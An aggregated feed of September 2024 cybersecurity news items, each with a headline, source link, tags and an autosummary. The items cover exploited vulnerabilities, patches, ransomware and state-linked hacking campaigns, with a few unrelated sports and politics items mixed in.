        Scammers are now throwing in the name of the partner of the targeted victim, telling them that their partner is cheating on them.

        Autosummary: (We have all [his/her] address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all [his/her] contacts) and are willing to give you a full access to this data. Based on speculation among Reddit users, BleepingComputer contacted a wedding planning site called The Knot, which was listed as a possible source, but received no reply.


        Galileo delivers real-time fraud detection for fintechs, banks and businesses

        financial
        2024-09-10 https://www.helpnetsecurity.com/2024/09/10/galileo-instant-verification-engine/

        Galileo is delivering fintechs, banks and businesses new ways to fight fraud with the launch of Galileo Instant Verification Engine (GIVE) and Transaction Risk GScore. As digital transactions surge and cyber threats evolve, these tools offer fintechs, financial institutions and businesses advanced real-time fraud detection and risk management capabilities, addressing an industry in which 63% of financial firms reported an increase in fraud, with digital channels contributing to half of the total fraud losses. Galileo … More

        The post Galileo delivers real-time fraud detection for fintechs, banks and businesses appeared first on Help Net Security.

        Autosummary: As digital transactions surge and cyber threats evolve, these tools offer fintechs, financial institutions and businesses advanced real-time fraud detection and risk management capabilities, addressing an industry in which 63% of financial firms reported an increase in fraud, with digital channels contributing to half of the total fraud losses. Why GIVE and GScore matter: The Galileo Instant Verification Engine and GScore empower financial institutions, fintechs and businesses to navigate the complexities of an increasingly digital financial landscape, reducing fraud, improving operational efficiency, and delivering a seamless customer experience across multiple payment channels.


        CISA confirms that SonicWall vulnerability is getting exploited (CVE-2024-40766)

        exploits
        2024-09-10 https://www.helpnetsecurity.com/2024/09/10/cve-2024-40766-exploited/

        The US Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2024-40766 – a recently fixed improper access control vulnerability affecting SonicWall’s firewalls – to its Known Exploited Vulnerabilities catalog, thus confirming it is being actively exploited by attackers. Though the KEV entry does not say that it’s being leveraged in ransomware campaigns, both Arctic Wolf and Rapid7 say that there is indirect evidence pointing to that. What we know so far On the same day … More

        The post CISA confirms that SonicWall vulnerability is getting exploited (CVE-2024-40766) appeared first on Help Net Security.



        Experts Identify 3 Chinese-Linked Clusters Behind Cyberattacks in Southeast Asia

        ciber
        2024-09-10 https://thehackernews.com/2024/09/experts-identify-3-chinese-linked.html
        A trio of threat activity clusters linked to China has been observed compromising more government organizations in Southeast Asia as part of a renewed state-sponsored operation codenamed Crimson Palace, indicating an expansion in the scope of the espionage effort. Cybersecurity firm Sophos, which has been monitoring the cyber offensive, said it comprises three intrusion sets tracked as Cluster

        Autosummary: In a nutshell, the three clusters work hand in hand, while simultaneously focusing on specific tasks in the attack chain: infiltrating target environments and conducting reconnaissance (Alpha), burrowing deep into the networks using various C2 mechanisms (Bravo), and exfiltrating valuable data (Charlie).


        Shining a Light on Shadow Apps: The Invisible Gateway to SaaS Data Breaches

        financial
        2024-09-10 https://thehackernews.com/2024/09/shining-light-on-shadow-apps-invisible.html
        Shadow apps, a segment of Shadow IT, are SaaS applications purchased without the knowledge of the security team. While these applications may be legitimate, they operate within the blind spots of the corporate security team and expose the company to attackers. Shadow apps may include instances of software that the company is already using. For example, a dev team may onboard their own

        Autosummary: Not only do they monitor configurations, users, devices, and other elements of the SaaS stack, but they are essential in detecting all non-human identities, including shadow applications. Email security tools routinely scan email traffic, looking for malicious links, phishing attempts, malware attachments, and other email-borne threats. When shadow apps are in use, IT teams may be blind to potential threats, unable to detect unauthorized data transfers, or unaware of risks stemming from outdated or insecure applications.


        New PIXHELL Attack Exploits Screen Noise to Exfiltrates Data from Air-Gapped Computers

        exploits
        2024-09-10 https://thehackernews.com/2024/09/new-pixhell-attack-exploits-screen.html
        A new side-channel attack dubbed PIXHELL could be abused to target air-gapped computers by breaching the "audio gap" and exfiltrating sensitive information by taking advantage of the noise generated by the pixels on the screen. "Malware in the air-gap and audio-gap computers generates crafted pixel patterns that produce noise in the frequency range of 0 - 22 kHz," Dr. Mordechai Guri, the head of

        Autosummary: The attack, however, could be transformed into a stealthy one during working hours by reducing the pixel colors to very low values prior to transmission -- i.e., using RGB levels of (1,1,1), (3,3,3), (7,7,7), and (15,15,15) -- thereby giving the impression to the user that the screen is black. Prior studies undertaken by Dr. Guri have employed sounds generated by computer fans (Fansmitter), hard disk drives (Diskfiltration), CD/DVD drives (CD-LEAK), power supply units (POWER-SUPPLaY), and inkjet printers (Inkfiltration).


        Poland thwarted cyberattacks that were carried out by Russia and Belarus

        ciber
        2024-09-10 https://securityaffairs.com/168258/cyber-warfare-2/poland-thwarted-cyberattacks-russia-and-belarus.html
        Poland's security officials announced that they successfully thwarted cyberattacks that were carried out by Russia and Belarus. Poland's security services announced they have thwarted a cyber operation orchestrated by Russia and Belarus, aimed at destabilizing the country, according to Deputy Prime Minister and Minister for digital affairs Krzysztof Gawkowski. “The Belarusian and Russian foreign […]

        Autosummary: In April 2022, the same group claimed responsibility for DDoS attacks on the sites of institutions in states such as the USA, Estonia, Poland, the Czech Republic, and also on NATO sites. “Poland has registered up to 1,000 online attacks daily targeting government institutions and agencies, officials said, linking them to the country’s support for neighboring Ukraine in its 2 1/2-year war against Russia’s invasion,” reported the Associated Press.


        RansomHub ransomware abuses Kaspersky TDSSKiller to disable EDR software

        exploits ransomware
        2024-09-10 https://www.bleepingcomputer.com/news/security/ransomhub-ransomware-abuses-kaspersky-tdsskiller-to-disable-edr-software/
        The RansomHub ransomware gang has been using TDSSKiller, a legitimate tool from Kaspersky, to disable endpoint detection and response (EDR) services on target systems. [...]

        Autosummary: EDR agents are more advanced solutions that operate, at least partially, at the kernel level, as they need to monitor and control low-level system activities such as file access, process creation, and network connections, all providing real-time protection against threats like ransomware.


        Microsoft fixes Windows Smart App Control zero-day exploited since 2018

        exploits
        2024-09-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-smart-app-control-zero-day-exploited-since-2018/
        Microsoft has fixed a Windows Smart App Control and SmartScreen flaw that has been exploited in attacks as a zero-day since at least 2018. [...]

        Autosummary: To exploit this flaw, attackers can add a dot or space to the target executable path (for instance, adding it to the binary name like "powershell.exe.") or create an LNK file with a relative path like ".\target.exe."


        Microsoft September 2024 Patch Tuesday fixes 4 zero-days, 79 flaws

        exploits
        2024-09-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-september-2024-patch-tuesday-fixes-4-zero-days-79-flaws/
        Today is Microsoft's September 2024 Patch Tuesday, which includes security updates for 79 flaws, including four actively exploited and one publicly disclosed zero-days. [...]

        Autosummary: The number of bugs in each vulnerability category is listed below: 30 Elevation of Privilege Vulnerabilities; 4 Security Feature Bypass Vulnerabilities; 23 Remote Code Execution Vulnerabilities; 11 Information Disclosure Vulnerabilities; 8 Denial of Service Vulnerabilities; 3 Spoofing Vulnerabilities. To learn more about the non-security updates released today, you can review our dedicated articles on the new Windows 11 KB5043076 cumulative update and Windows 10 KB5043064 update.


        Wix to block Russian users starting September 12

        rusia-ucrania
        2024-09-10 https://www.bleepingcomputer.com/news/legal/wix-to-block-russian-users-starting-september-12/
        Wix.com has announced it will stop providing services to Russian users on September 12, 2024, with all accounts from Russia, including free and premium, to be blocked and their websites taken down. [...]

        Autosummary: It offers a user-friendly interface, an extensive collection of templates, an app market to expand functionality, SEO tools, and dedicated e-commerce tools to handle payments and shipping.


        CosmicBeetle Deploys Custom ScRansom Ransomware, Partnering with RansomHub

        exploits ransomware
        2024-09-10 https://thehackernews.com/2024/09/cosmicbeetle-deploys-custom-scransom.html
        The threat actor known as CosmicBeetle has debuted a new custom ransomware strain called ScRansom in attacks targeting small- and medium-sized businesses (SMBs) in Europe, Asia, Africa, and South America, while also likely working as an affiliate for RansomHub. "CosmicBeetle replaced its previously deployed ransomware, Scarab, with ScRansom, which is continually improved," ESET researcher Jakub

        Autosummary: Targets of ScRansom attacks span manufacturing, pharmaceuticals, legal, education, healthcare, technology, hospitality, leisure, financial services, and regional government sectors. POORTRY, detected as far back as 2021, is also referred to as BURNTCIGAR, and has been used by multiple ransomware gangs, including CUBA, BlackCat, Medusa, LockBit, and RansomHub over the years.


        Ivanti fixes maximum severity RCE bug in Endpoint Management software

        exploits
        2024-09-10 https://www.bleepingcomputer.com/news/security/ivanti-fixes-maximum-severity-rce-bug-in-endpoint-management-software/
        Ivanti has fixed a maximum severity vulnerability in its Endpoint Management software (EPM) that can let unauthenticated attackers gain remote code execution on the core server. [...]


        Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes

        exploits
        2024-09-10 https://www.helpnetsecurity.com/2024/09/10/cve-2024-38217-cve-2024-43491/

        September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, including those for a handful of zero-days (CVE-2024-38217, CVE-2024-38226, CVE-2024-38014, CVE-2024-43461) exploited by attackers in the wild, and a Windows 10 code defect (CVE-2024-43491) that rolled back earlier CVE fixes. The actively exploited flaws Let’s start with the only one that was previously publicly known: CVE-2024-38217, a vulnerability that allows attackers to bypass Mark of the Web (MotW). Elastic Security researcher Joe Desimone … More

        The post Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes appeared first on Help Net Security.

        Autosummary: September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, including those for a handful of zero-days (CVE-2024-38217, CVE-2024-38226, CVE-2024-38014, CVE-2024-43461) exploited by attackers in the wild, and a Windows 10 code defect (CVE-2024-43491) that rolled back earlier CVE fixes. Other vulnerabilities of note: CVE-2024-43491 is an interesting vulnerability that has effectively rolled back the fixes for some vulnerabilities affecting Optional Components – e.g., Internet Explorer 11, Windows Media Player, MSMQ server core, etc. – on Windows 10, version 1507.


        Quad7 botnet evolves to more stealthy tactics to evade detection

        industry
        2024-09-10 https://securityaffairs.com/168250/malware/quad7-botnet-evolves.html
        The Quad7 botnet evolves and targets new SOHO devices, including Axentra media servers, Ruckus wireless routers and Zyxel VPN appliances. The Sekoia TDR team identified additional implants associated with the Quad7 botnet operation. The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and […]

        Autosummary: The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and previously unknown vulnerabilities.


        Billam-Smith to face Mexico's Ramirez in unification bout

        latam
        2024-09-10 https://www.bbc.com/sport/boxing/articles/c703260y4y6o
        WBO cruiserweight champion Chris Billam-Smith will take on WBA champion Gilberto Ramirez in a unification bout in Riyadh on 16 November.


        AI cybersecurity needs to be as multi-layered as the system it’s protecting

        ciber
        2024-09-09 https://www.helpnetsecurity.com/2024/09/09/ai-cybersecurity-needs/

        Cybercriminals are beginning to take advantage of the new malicious options that large language models (LLMs) offer them. LLMs make it possible to upload documents with hidden instructions that are executed by connected system components. This is a boon to cybercriminals and, thus, a substantive risk to the enterprises using them. LLMs can be tricked in many ways. Cybercriminals can input malicious prompts that trick the LLM into overriding its guardrails (i.e., generating harmful outputs), … More

        The post AI cybersecurity needs to be as multi-layered as the system it’s protecting appeared first on Help Net Security.

        Autosummary: Examples of these attacks include full-scale tax fraud in China, where attackers fraudulently acquired $77 million by creating fake shell companies and sending invoices to victims the tax system recognized as clients, and unemployment claim fraud in California, in which attackers withdrew $3.4 million in falsified unemployment benefits by collecting real identities to create fake driver licenses, thus exploiting flaws in the system’s identity verification process. From there, cybersecurity solutions fall into four key categories: design, development, deployment, and operation.


        Phishing in focus: Disinformation, election and identity fraud

        financial
        2024-09-09 https://www.helpnetsecurity.com/2024/09/09/phishing-election-identity-fraud-video/

        The frequency of phishing attacks is rising as attackers increasingly utilize AI to execute more scams than ever before. In this Help Net Security video, Abhilash Garimella, Head Of Research at Bolster, discusses how phishing scams are now being hosted in the U.S. at nearly twice the rate compared to 2023, and this trend is only accelerating. Bolster’s researchers identified packages of voter data stolen over the past decade, available for sale on the dark … More

        The post Phishing in focus: Disinformation, election and identity fraud appeared first on Help Net Security.



        Red Hat Enterprise Linux AI extends innovation across the hybrid cloud

        Linux
        2024-09-09 https://www.helpnetsecurity.com/2024/09/09/red-hat-enterprise-linux-ai/

        Red Hat Enterprise Linux (RHEL) AI is Red Hat’s foundation model platform, enabling users to develop, test, and run GenAI models to power enterprise applications. The platform brings together the open source-licensed Granite LLM family and InstructLab model alignment tools based on the Large-scale Alignment for chatBots (LAB) methodology, packaged as an optimized, bootable RHEL image for individual server deployments across the hybrid cloud. While GenAI’s promise is immense, the associated costs of procuring, training, … More

        The post Red Hat Enterprise Linux AI extends innovation across the hybrid cloud appeared first on Help Net Security.

        Autosummary: While GenAI’s promise is immense, the associated costs of procuring, training, and fine-tuning LLMs can be astronomical, with some leading models costing nearly $200 million to train before launch.


        New Android SpyAgent Malware Uses OCR to Steal Crypto Wallet Recovery Keys

        exploits
        2024-09-09 https://thehackernews.com/2024/09/new-android-spyagent-malware-uses-ocr.html
        Android device users in South Korea have emerged as a target of a new mobile malware campaign that delivers a new type of threat dubbed SpyAgent. The malware "targets mnemonic keys by scanning for images on your device that might contain them," McAfee Labs researcher SangRyol Ryu said in an analysis, adding the targeting footprint has broadened in scope to include the U.K. The campaign makes use

        Autosummary: The malware "targets mnemonic keys by scanning for images on your device that might contain them," McAfee Labs researcher SangRyol Ryu said in an analysis, adding the targeting footprint has broadened in scope to include the U.K. The campaign makes use of bogus Android apps that are disguised as seemingly legitimate banking, government facilities, streaming, and utility apps in an attempt to trick users into installing them.


        U.S. Offers $10 Million for Info on Russian Cadet Blizzard Hackers Behind Major Attacks

        rusia-ucrania
        2024-09-09 https://thehackernews.com/2024/09/us-offers-10-million-for-info-on.html
        The U.S. government and a coalition of international partners have officially attributed a Russian hacking group tracked as Cadet Blizzard to the General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155). "These cyber actors are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm

        Autosummary: The joint advisory, released last week as part of a coordinated exercise dubbed Operation Toy Soldier, comes from cybersecurity and intelligence authorities in the U.S., the Netherlands, the Czech Republic, Germany, Estonia, Latvia, Ukraine, Canada, Australia, and the U.K. Cadet Blizzard, also known as Ember Bear, FROZENVISTA, Nodaria, Ruinous Ursa, UAC-0056, and UNC2589, gained attention in January 2022 for deploying the destructive WhisperGate (aka PAYWIPE) malware against multiple Ukrainian victim organizations in advance of Russia's full-blown military invasion of the country.


        TIDRONE APT targets drone manufacturers in Taiwan

        industry
        2024-09-09 https://securityaffairs.com/168210/apt/tidrone-targets-organizations-taiwan.html
        A previously undocumented threat actor tracked as TIDRONE targets organizations in the military and satellite industries in Taiwan. Trend Micro spotted an allegedly China-linked threat actor, tracked as TIDRONE, targeting drone manufacturers in Taiwan. The group, which was previously undocumented, uses enterprise resource planning (ERP) software and remote desktops to deploy advanced malware, including CXCLNT and CLNTEND. CXCLNT […]

        Autosummary: Since April, the group has used CLNTEND, a previously undetected remote access tool (RAT), which supports a wider range of network protocols for communication, further enhancing their capabilities.


        Multiple malware families delivered exploiting GeoServer GeoTools flaw CVE-2024-36401

        exploits
        2024-09-09 https://securityaffairs.com/168197/malware/geoserver-geotools-flaw-cve-2024-36401-malware.html
        Multiple threat actors actively exploited the recently disclosed OSGeo GeoServer GeoTools flaw CVE-2024-36401 in malware-based campaigns. Researchers at Fortinet FortiGuard Labs reported that threat actors exploited the recently disclosed OSGeo GeoServer GeoTools flaw (CVE-2024-36401) to deliver various malware families, including cryptocurrency miners, bots, and the SideWalk backdoor. GeoServer is an open-source server that allows users […]

        Autosummary: The attack starts with a shell script that downloads binaries for various architectures (ARM, MIPS, X86), extracts a command-and-control (C2) server from an encrypted configuration, and connects to it.


        Veeam Backup & Replication RCE flaw may soon be leveraged by ransomware gangs (CVE-2024-40711)

        exploits ransomware
        2024-09-09 https://www.helpnetsecurity.com/2024/09/09/cve-2024-40711-exploited/

        CVE-2024-40711, a critical vulnerability affecting Veeam Backup & Replication (VBR), could soon be exploited by attackers to steal enterprise data. Discovered and reported by Code White researcher Florian Hauser, the vulnerability can be leveraged for full system takeover, and security researchers from watchTowr Labs have already confirmed its potential for exploitation. Luckily for enterprises using VBR, both companies have refrained from sharing PoC exploit code or additional details about the flaw until most admins have … More

        The post Veeam Backup & Replication RCE flaw may soon be leveraged by ransomware gangs (CVE-2024-40711) appeared first on Help Net Security.



        Blind Eagle Targets Colombian Insurance Sector with Customized Quasar RAT

        latam
        2024-09-09 https://thehackernews.com/2024/09/blind-eagle-targets-colombian-insurance.html
        The Colombian insurance sector is the target of a threat actor tracked as Blind Eagle with the end goal of delivering a customized version of a known commodity remote access trojan (RAT) known as Quasar RAT since June 2024. "Attacks have originated with phishing emails impersonating the Colombian tax authority," Zscaler ThreatLabz researcher Gaetano Pellegrino said in a new analysis published


        Chinese Hackers Exploit Visual Studio Code in Southeast Asian Cyberattacks

        exploits ciber
        2024-09-09 https://thehackernews.com/2024/09/chinese-hackers-exploit-visual-studio.html
        The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia. "This threat actor used Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks," Palo Alto Networks Unit 42 researcher Tom Fakterman said in a

        Autosummary: Mustang Panda, also known by the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, and Red Lich, has been operational since 2012, routinely conducting cyber espionage campaigns targeting government and religious entities across Europe and Asia, particularly those located in South China Sea countries.


        Wing Security SaaS Pulse: Continuous Security & Actionable Insights — For Free

        ransomware
        2024-09-09 https://thehackernews.com/2024/09/wing-security-saas-pulse-continuous.html
        Designed to be more than a one-time assessment, Wing Security’s SaaS Pulse provides organizations with actionable insights and continuous oversight into their SaaS security posture, and it’s free! Introducing SaaS Pulse: Free Continuous SaaS Risk Management. Just like waiting for a medical issue to become critical before seeing a doctor, organizations can’t afford to overlook the constantly

        Autosummary: Security teams instantly get a real-time security "health" score, prioritized risks, contextualized threat insights, and the organization's app inventory, without setups or integrations. Users get instant clarity on App2App connectivity, third-party risk management (TPRM), Gen-AI, compliance, and more.


        Progress Software Issues Patch for Vulnerability in LoadMaster and MT Hypervisor

        exploits
        2024-09-09 https://thehackernews.com/2024/09/progress-software-issues-patch-for.html
        Progress Software has released security updates for a maximum-severity flaw in LoadMaster and Multi-Tenant (MT) hypervisor that could result in the execution of arbitrary operating system commands. Tracked as CVE-2024-7591 (CVSS score: 10.0), the vulnerability has been described as an improper input validation bug that results in OS command injection. "It is possible for unauthenticated, remote


        Payment gateway data breach affects 1.7 million credit card owners

        financial
        2024-09-09 https://www.bleepingcomputer.com/news/security/payment-gateway-data-breach-affects-17-million-credit-card-owners/
        Payment gateway provider Slim CD has disclosed a data breach that compromised credit card and personal data belonging to almost 1.7 million individuals. [...]


        Critical SonicWall SSLVPN bug exploited in ransomware attacks

        exploits ransomware
        2024-09-09 https://www.bleepingcomputer.com/news/security/critical-sonicwall-sslvpn-bug-exploited-in-ransomware-attacks/
        Ransomware affiliates exploit a critical security vulnerability in SonicWall SonicOS firewall devices to breach victims' networks. [...]

        Autosummary: Federal agencies ordered to patch by September 30: CISA followed suit on Monday, adding the critical access control flaw to its Known Exploited Vulnerabilities catalog, ordering federal agencies to secure vulnerable SonicWall firewalls on their networks within three weeks, by September 30, as mandated by Binding Operational Directive (BOD) 22-01.


        Chinese hackers use new data theft malware in govt attacks

        exploits
        2024-09-09 https://www.bleepingcomputer.com/news/security/chinese-hackers-use-new-data-theft-malware-in-govt-attacks/
        New attacks attributed to China-based cyber espionage group Mustang Panda show that the threat actor switched to new strategies and malware called FDMTP and PTSOCKET to download payloads and steal information from breached networks. [...]

        Autosummary: Overview of the spear-phishing infection chain (Source: Trend Micro). Trend Micro researchers say that Mustang Panda, which the company tracks as Earth Preta, has made significant strides in "malware deployment and strategies, particularly in their campaigns targeting government entities" (e.g. military, police, foreign affair agencies, welfare, the executive branch, and education in the APAC region).


        Highline Public Schools closes schools following cyberattack

        ciber
        2024-09-09 https://www.bleepingcomputer.com/news/security/highline-public-schools-closes-schools-following-cyberattack/
        Highline Public Schools, a K-12 district in Washington state, has shut down all schools and canceled school activities after its technology systems were compromised in a cyberattack. [...]

        Autosummary: In a statement issued Monday, the district confirmed that all schools would remain closed, and all activities, including athletics and meetings, would be canceled on September 9.


        Apple banks on AI to boost sales of new iPhone 16

        financial
        2024-09-09 https://www.bbc.com/news/articles/c8erzx2n3j7o
        The firm says its new handset has been built for artificial intelligence as it looks to regain its edge.

        Autosummary: Apple said its new phones, which come with longer lasting batteries, more powerful chips and enhanced privacy features, were its first built specifically to handle AI and its new "Apple Intelligence" tools, many of which were announced in June.


        Week in review: Vulnerability allows Yubico security keys cloning, Patch Tuesday forecast

        exploits
        2024-09-08 https://www.helpnetsecurity.com/2024/09/08/week-in-review-vulnerability-allows-yubico-security-keys-cloning-patch-tuesday-forecast/

        Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Vulnerability allows Yubico security keys to be cloned Researchers have unearthed a cryptographic vulnerability in popular Yubico (FIDO) hardware security keys and modules that may allow attackers to clone the devices. September 2024 Patch Tuesday forecast: Downgrade is the new exploit Microsoft confirmed several reported issues throughout the month about the August updates. They added a comment to KB5041578 for … More

        The post Week in review: Vulnerability allows Yubico security keys cloning, Patch Tuesday forecast appeared first on Help Net Security.

        Autosummary: Infosec products of the month: August 2024. Here’s a look at the most interesting products from the past month, featuring releases from: Adaptive Shield, AppOmni, ArmorCode, Bitwarden, Cequence Security, ClearSale, Clutch Security, Contrast Security, Dragos, Elastic, Endor Labs, Entrust, Fortanix, Fortinet, Guardio, HYCU, Ivanti, McAfee, Nucleus Security, Own, Rapid7, Resecurity, Rezonate, RightCrowd, Stellar, Veza, Wallarm, and Wing Security. New infosec products of the week: September 6, 2024. Here’s a look at the most interesting products from the past week, featuring releases from Binarly, Bitdefender, Prompt Security, Revenera, Skyhigh Security, and Vanta.


        Venezuela's opposition leader leaves country for Spain

        government
        2024-09-08 https://www.bbc.com/news/articles/c14zdypxr7no
        The Venezuelan government says opposition candidate Edmundo González asked Spain for political asylum.

        Autosummary: Venezuela's opposition leader leaves country for Spain (Reuters). The Venezuelan government has said opposition presidential candidate Edmundo González has left the country, seeking asylum in Spain.


        SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 10

        exploits
        2024-09-08 https://securityaffairs.com/168168/malware/security-affairs-malware-newsletter-round-10.html
        Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. BlackSuit Ransomware Dissecting the Cicada; Year-Long Campaign of Malicious npm Packages Targeting Roblox Users; Rocinante: The trojan horse that wanted to fly; Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads; Earth […]


        North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams

        financial exploits
        2024-09-07 https://thehackernews.com/2024/09/north-korean-threat-actors-deploy.html
        Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation. These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector. "After an initial chat conversation, the attacker sent a ZIP file that contained "

        Autosummary: "The actors may reference personal information, interests, affiliations, events, personal relationships, professional connections, or details a victim may believe are known to few others," the FBI said, highlighting attempts to build rapport and eventually deliver malware. "


        FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals

        rusia-ucrania
        2024-09-07 https://thehackernews.com/2024/09/fbi-cracks-down-on-dark-web-marketplace.html
        Two men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information. Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire "

        Autosummary: Flashpoint, in a report published last month, said WWH-Club remains operational despite the law enforcement effort, and that "its other administrators are attempting to distance themselves from Kublitskii and Khodyrev." Khodyrev and Kublitskii "had been living in Miami for the past two years, while secretly continuing to administer WWH Club and its sister dark web marketplaces, forums, and schools," the DoJ said. "


        Sextortion scam now uses your "cheating" spouse’s name as a lure

        financial
        2024-09-07 https://www.bleepingcomputer.com/news/security/sextortion-scam-now-use-your-cheating-spouses-name-as-a-lure/
        A new variant of the ongoing sextortion email scams is now targeting spouses, saying that their husband or wife is cheating on them, with links to the alleged proof. [...] "

        Autosummary: We made a full backup of his disk (We have all his address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all his contacts) and are willing to give you full access to this data. Since then, scammers have created a wide variety of extortion email scams, including ones that pretend to be hitman contracts, bomb threats, CIA investigations, and threats of installing ransomware. "


        U.S. CISA adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog

        exploits
        2024-09-07 https://securityaffairs.com/168153/security/cisa-draytek-vigorconnect-kingsoft-wps-office-bugs-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Draytek VigorConnect and Kingsoft WPS Office vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these vulnerabilities: At the end of August, […] "

        Autosummary: Pierluigi Paganini, September 07, 2024. U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog. "


        Argentina condemn Australia to biggest Test defeat

        latam
        2024-09-07 https://www.bbc.com/sport/rugby-union/articles/cpw8lk9djd7o
        Argentina overturn a 17-point deficit to condemn Australia to their heaviest Test defeat, with a thumping victory in the Rugby Championship. "

        Autosummary: "


        Sextortion scams now use your "cheating" spouse’s name as a lure

        financial
        2024-09-07 https://www.bleepingcomputer.com/news/security/sextortion-scams-now-use-your-cheating-spouses-name-as-a-lure/
        A new variant of the ongoing sextortion email scams is now targeting spouses, saying that their husband or wife is cheating on them, with links to the alleged proof. [...] "

        Autosummary: We made a full backup of his disk (We have all his address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all his contacts) and are willing to give you full access to this data. Since then, scammers have created a wide variety of extortion email scams, including ones that pretend to be hitman contracts, bomb threats, CIA investigations, and threats of installing ransomware. "


        83% of organizations experienced at least one ransomware attack in the last year

        exploits ransomware
        2024-09-06 https://www.helpnetsecurity.com/2024/09/06/organizations-experienced-ransomware-attack/

        Ransomware is an all-too-common occurrence: 83% of organizations have experienced at least one ransomware attack in the last year, 46% of respondents experienced four or more and 14% indicated they experienced 10 or more. Of those respondents who experienced at least one ransomware attack in the last year, 61% said it resulted in downtime of at least 24 hours, according to Onapsis. (Chart source: Onapsis) Of those organizations that experienced ransomware attacks, 89% said their Enterprise … More

        The post 83% of organizations experienced at least one ransomware attack in the last year appeared first on Help Net Security.

        "

        Autosummary: "


        September 2024 Patch Tuesday forecast: Downgrade is the new exploit

        exploits
        2024-09-06 https://www.helpnetsecurity.com/2024/09/06/september-2024-patch-tuesday-forecast/

        I asked for a calm August 2024 Patch Tuesday in last month’s forecast article and that came to pass. The updates released were limited to the regular operating systems and all forms of Office applications. Six zero-day vulnerabilities were announced, with five in the operating systems and one in the Office applications. There were 63 CVEs addressed in the Windows 10 operating systems and associated servers and 55 CVEs addressed in Windows 11. Overall, it … More

        The post September 2024 Patch Tuesday forecast: Downgrade is the new exploit appeared first on Help Net Security.

        "

        Autosummary: September 2024 Patch Tuesday forecast: Microsoft will release the standard operating system, Office, Sharepoint, and perhaps a .NET framework or SQL update this month. Overall, it was a straightforward set of updates to deploy, but several issues were identified over the past month, which Microsoft has acknowledged and is working on. "


        Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195)

        exploits
        2024-09-06 https://www.helpnetsecurity.com/2024/09/06/cve-2024-45195/

        For the fourth time in the last five months, Apache OFBiz users have been advised to upgrade their installations to fix a critical flaw (CVE-2024-45195) that could lead to unauthenticated remote code execution. About CVE-2024-45195 Apache OFBiz is an open-source suite for enterprise resource planning (ERP), which contains web applications for human resources management, customer relationship management, accounting, marketing, etc. “Apache OFBiz is used by numerous large organizations, and previously disclosed vulnerabilities for it have … More

        The post Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195) appeared first on Help Net Security.

        "

        Autosummary: "


        The State of the Virtual CISO Report: MSP/MSSP Security Strategies for 2025

        government
        2024-09-06 https://thehackernews.com/2024/09/the-state-of-virtual-ciso-report.html
        The 2024 State of the vCISO Report continues Cynomi’s tradition of examining the growing popularity of virtual Chief Information Security Officer (vCISO) services. According to the independent survey, the demand for these services is increasing, with both providers and clients reaping the rewards. The upward trend is set to continue, with even faster growth expected in the future. However, "

        Autosummary: As can be seen in Figure 5, MSPs and MSSPs have identified the main benefits of a vCISO platform as standardizing work processes (36%), accelerating onboarding of their new employees (34%), easy access to compliance frameworks (33%), increased revenue (33%) and easy upselling (32%). Just as importantly, 43% of MSPs and MSSPs identified improved customer security as a beneficial impact of adding vCISO services, 38% enjoyed increased client engagement, and 38% were able to upsell additional products and services. The report reveals a startling trend: a significant majority (98%) feel overwhelmed by the complexities of security and compliance frameworks like NIST, ISO, PCI-DSS, GDPR, and more. Obstacles to Offering vCISO Services and How to Address Them: Yet, the path to vCISO success requires addressing certain challenges, as can be seen in Figure 4. 29% of respondents report that they lack the technology that can help them support and offer vCISO services. "


        SpyAgent Android malware steals your crypto recovery phrases from images

        exploits
        2024-09-06 https://www.bleepingcomputer.com/news/security/spyagent-android-malware-steals-your-crypto-recovery-phrases-from-images/
        A new Android malware named SpyAgent uses optical character recognition (OCR) technology to steal cryptocurrency wallet recovery phrases from screenshots stored on the mobile device. [...] "

        Autosummary: Timeline of the SpyAgent campaign (Source: McAfee). In July 2023, Trend Micro revealed two Android malware families named CherryBlos and FakeTrade, spread via Google Play, that also used OCR to steal cryptocurrency data from extracted images, so this tactic appears to be gaining traction. "


